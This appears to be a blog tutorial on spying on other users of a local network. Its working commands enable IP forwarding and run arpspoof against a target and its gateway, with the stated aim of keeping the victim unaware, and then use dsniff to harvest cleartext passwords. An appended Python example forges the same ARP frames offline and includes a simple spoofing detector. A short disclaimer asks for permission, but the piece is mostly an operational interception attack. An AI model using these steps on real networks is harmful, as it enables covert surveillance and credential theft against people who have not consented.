How-To spy on other users on the local network

Sometimes it’s nice to know what kind of people you’re sharing a LAN with. This hack lets you sniff packets from other hosts on a switched LAN, where the switch would normally deliver each frame only to the port of the host it is addressed to. What we accomplish by ARP spoofing is tricking a host on the LAN into sending us the frames it would normally send to the gateway (the router that forwards them on to the internet): we keep sending the target forged ARP replies claiming that the gateway’s IP address is at our MAC address, the target’s ARP cache believes us, and from then on its outbound traffic arrives at our network card first.

****Disclaimer****
This should only ever be done on a network that you run or otherwise have permission to monitor other users activities.

This tutorial should apply to any *nix based operating system with little modification.

The first thing we need is the dsniff suite of applications. On OS X you can install it via MacPorts (formerly DarwinPorts); on Linux it is normally available from your distribution’s package manager (e.g. yum or apt).

Next we need to turn on IP forwarding in the OS, so that the packets the target sends us are forwarded on to their intended destination and whoever we’re spying on keeps working internet and doesn’t get suspicious. Without this, the target’s traffic dead-ends on our machine and the target simply sees a network outage. The settings below (and arpspoof itself) need root privileges, so run them from a root shell; note that putting a plain sudo in front of the echo does not help, because the redirect is performed by your own unprivileged shell.

OS X

sysctl -w net.inet.ip.forwarding=1

Linux

echo 1 > /proc/sys/net/ipv4/ip_forward

Next we begin ARP spoofing with the “arpspoof” command from the dsniff suite:

arpspoof -t xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy

xxx.xxx.xxx.xxx is the target of our ARP spoof (the host whose packets we want to capture) and yyy.yyy.yyy.yyy is the host we want to pretend to be (this should be the default gateway for the network). If arpspoof picks the wrong network interface, add -i followed by the interface name. arpspoof keeps resending the forged reply every couple of seconds so the target’s ARP cache never times out and reverts to the real entry; when you stop it with Ctrl-C it sends a correcting reply carrying the gateway’s real MAC, so always stop it cleanly rather than killing the terminal, or the target is left with a poisoned cache and no connectivity.

You should see output similar to the following. Each line is one forged frame: the first MAC is our own, 0806 is the ARP EtherType, 42 is the frame length in bytes, and the payload is an ARP reply claiming that the gateway’s IP address is at our MAC:

0:1b:63:b6:df:b1 ff:ff:ff:ff:ff:ff 0806 42: arp reply yyy.yyy.yyy.yyy is-at 0:1b:63:b6:df:b1
0:1b:63:b6:df:b1 ff:ff:ff:ff:ff:ff 0806 42: arp reply yyy.yyy.yyy.yyy 0 is-at 0:1b:63:b6:df:b1

Now open up your favorite packet sniffer and you should see traffic from the target going out to the internet. Filter on the target’s IP address so your own machine’s traffic doesn’t drown it out.

Some good packet sniffers are Wireshark and tcpdump.

Or, if you’re just after passwords or other login information, fire up dsniff and it will keep watch for credentials sent in the clear over the connection (FTP, Telnet, POP, IMAP, HTTP basic auth and the other protocols it knows about). Anything inside an SSL/TLS session stays opaque to it; dsniff is a sniffer, not an SSL stripper.

Note that we’ve set up a one-way ARP spoof here, so we’re only going to see traffic from the target out to the internet; the gateway still sends the replies straight to the target’s real MAC. If we want to see the other direction as well, open up another console window and run a second instance of arpspoof with the arguments reversed:

so

arpspoof -t yyy.yyy.yyy.yyy xxx.xxx.xxx.xxx

Where yyy.yyy.yyy.yyy is again the gateway and xxx.xxx.xxx.xxx is the target. This poisons the gateway’s ARP cache with our MAC for the target’s IP address, so we now see traffic in both directions (some packaged builds of arpspoof, such as Debian’s and Kali’s, also accept -r to poison both hosts from a single instance). Poisoning the gateway is the noisier half: a router with a static ARP entry for the target, or one that logs MAC changes, or a switch running dynamic ARP inspection, may ignore the forged reply or flag it, so don’t be surprised if the return direction is the one that fails.
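To make concrete what arpspoof is putting on the wire (the 42-byte frames in the output above) and what the defender’s side of this looks like, here is an added Python example that is not part of the original post or of dsniff. It forges the same unsolicited ARP reply for both directions of the spoof using only the standard library, renders each frame in arpspoof’s log format, and runs a minimal arpwatch-style detector over the frames that flags the IP-to-MAC conflict. The addresses 192.168.1.1 (gateway), 192.168.1.50 (target) and the 00:11:22:33:44:xx MACs are constructed for the demo; only the attacker MAC is taken from the output above. Nothing is sent on the network; everything works on byte strings.

```python
"""Forge the ARP reply arpspoof sends, and detect it on the wire (stdlib only).

Added example, not code from the original post or from dsniff. All addresses
in run_demo() are constructed except the attacker MAC, which is from the post.
"""
import struct

ETH_P_ARP = 0x0806            # EtherType for ARP, the "0806" in arpspoof's output
ARPOP_REQUEST = 1
ARPOP_REPLY = 2
ARP_HEADER = struct.Struct("!HHBBH")   # htype, ptype, hlen, plen, opcode


def mac_to_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def bytes_to_mac(raw: bytes) -> str:
    # dsniff prints octets without zero padding ("0:1b:63:..."); do the same
    return ":".join(f"{octet:x}" for octet in raw)


def norm_mac(mac: str) -> str:
    return bytes_to_mac(mac_to_bytes(mac))


def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def bytes_to_ip(raw: bytes) -> str:
    return ".".join(str(octet) for octet in raw)


def build_arp_reply(attacker_mac, spoofed_ip, target_mac, target_ip) -> bytes:
    """Frame equivalent to `arpspoof -t target_ip spoofed_ip`: an unsolicited
    ARP reply, addressed to the target, saying spoofed_ip is-at attacker_mac."""
    ethernet = (mac_to_bytes(target_mac)                 # destination MAC
                + mac_to_bytes(attacker_mac)             # source MAC
                + struct.pack("!H", ETH_P_ARP))
    arp = (ARP_HEADER.pack(1, 0x0800, 6, 4, ARPOP_REPLY)
           + mac_to_bytes(attacker_mac) + ip_to_bytes(spoofed_ip)   # sender: the lie
           + mac_to_bytes(target_mac) + ip_to_bytes(target_ip))     # target: the victim
    return ethernet + arp     # 14 + 28 = 42 bytes, the "42:" in arpspoof's output


def parse_arp(frame: bytes):
    """ARP fields of an Ethernet frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = ARP_HEADER.unpack(frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "dst": bytes_to_mac(frame[0:6]), "src": bytes_to_mac(frame[6:12]), "op": op,
        "sha": bytes_to_mac(frame[22:28]), "spa": bytes_to_ip(frame[28:32]),
        "tha": bytes_to_mac(frame[32:38]), "tpa": bytes_to_ip(frame[38:42]),
    }


def describe(frame: bytes) -> str:
    """Render a frame the way arpspoof logs it."""
    p = parse_arp(frame)
    if p is None:
        return "not arp"
    if p["op"] == ARPOP_REPLY:
        body = f"arp reply {p['spa']} is-at {p['sha']}"
    else:
        body = f"arp who-has {p['tpa']} tell {p['spa']}"
    return f"{p['src']} {p['dst']} {ETH_P_ARP:04x} {len(frame)}: {body}"


class ArpWatch:
    """Minimal arpwatch: remember the MAC each IP first claimed and flag changes.
    Seed it with the gateway's real MAC so the very first forged reply is caught."""

    def __init__(self, known=None):
        self.table = {ip: norm_mac(mac) for ip, mac in (known or {}).items()}
        self.alerts = []

    def observe(self, frame: bytes):
        p = parse_arp(frame)
        if p is None or p["spa"] == "0.0.0.0":      # ARP probes carry no binding
            return None
        previous = self.table.setdefault(p["spa"], p["sha"])
        if previous == p["sha"]:
            return None
        kind = "reply" if p["op"] == ARPOP_REPLY else "request"
        alert = (f"ARP conflict for {p['spa']}: was {previous}, now claimed by "
                 f"{p['sha']} in a {kind} sent to {p['dst']}")
        self.alerts.append(alert)
        return alert


def run_demo():
    # Constructed addresses; only the attacker MAC comes from the post's output.
    attacker = "00:1b:63:b6:df:b1"
    gateway_ip, gateway_mac = "192.168.1.1", "00:11:22:33:44:01"
    target_ip, target_mac = "192.168.1.50", "00:11:22:33:44:02"

    # arpspoof -t 192.168.1.50 192.168.1.1   (first console: poison the target)
    to_target = build_arp_reply(attacker, gateway_ip, target_mac, target_ip)
    # arpspoof -t 192.168.1.1 192.168.1.50   (second console: poison the gateway)
    to_gateway = build_arp_reply(attacker, target_ip, gateway_mac, gateway_ip)

    watch = ArpWatch({gateway_ip: gateway_mac, target_ip: target_mac})
    for frame in (to_target, to_gateway):
        print(describe(frame))
        print("  ->", watch.observe(frame))
    return watch.alerts


if __name__ == "__main__":
    run_demo()
```

The detector deliberately trusts the first binding it sees, which is exactly the weakness the attack exploits; in practice you seed it from a known-good table (or DHCP leases) and alert on any change, which is what arpwatch and switch-side dynamic ARP inspection do.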

As always let me know if you have any questions or comments in the comments of this post.


Published by

LiamM

I'm a self-labeled Nerd who enjoys playing video games, restoring classic muscle cars (I have a '65 Mustang in the works), running Big Data clusters, tattoos, working on system automation, riding and customizing motorcycles, and writing Python code. I'm an SRE with DemonWare/Activision specializing in Big Data/Hadoop operations, but all opinions and views expressed on this site are solely my own.